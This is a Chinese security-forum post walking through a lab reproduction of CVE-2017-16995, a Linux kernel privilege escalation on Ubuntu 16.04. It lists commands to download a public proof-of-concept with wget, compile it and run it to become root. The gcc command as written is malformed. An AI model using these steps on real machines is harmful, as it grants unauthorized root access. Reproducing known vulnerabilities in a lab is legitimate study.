联系我们联系我们
电子邮箱电子邮箱

CVE-2017-16995漏洞复现【linux】

[复制链接]
  • TA的每日心情
    难过
    2020-10-17 09:59
  • 签到天数: 9 天

    [LV.3]偶尔看看II

    8989034 发表于 2020-9-30 16:58:35
    95 0
    影响版本:
    Linux内核:LinuxKernel Version 4.14 ~ 4.4
    Ubuntu版本:16.04.01~16.04.04
    一、安装ubuntu 16.04
    http://old-releases.ubuntu.com/releases/16.04.0/ubuntu-16.04.3-server-amd64.iso(推荐使用IDM下载,国内开源网站找不到对应版本)
    二、安装镜像
    使用VMware,尽量少分配磁盘,10G,足够,安装时候记住勾选GUI界面,或者使用推荐模式直接配置完成
    三、新建用户
    adduser 新建用户名
    输入密码,一路[y/n] y
    su - 新建用户名
    四、查看本机信息
    uname -r         //查询版本号
    id                    //查询当前用户权限
    四、进行提权
    wget http://cyseclabs.com/pub/upstream44.c      //下载POC代码 ,一般中断拒绝都是因为网络原因,更换即可

    gcc -o expupstream44.c                                    //编译POC代码为linux系统环境下的可执行文件exp
    ./exp                                                               //执行文件
    五、验证
    再次输入id命令,发现权限已经改变为root组,提权成功



    最终执行图

    最终执行图
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    发表新帖

    小黑屋|手机版|Archiver|华盟论坛 ( 京ICP备11013304号-8 )

    Powered by 华盟网 X 8.0  © 2001-2013 Comsenz Inc.  华夏黑客同盟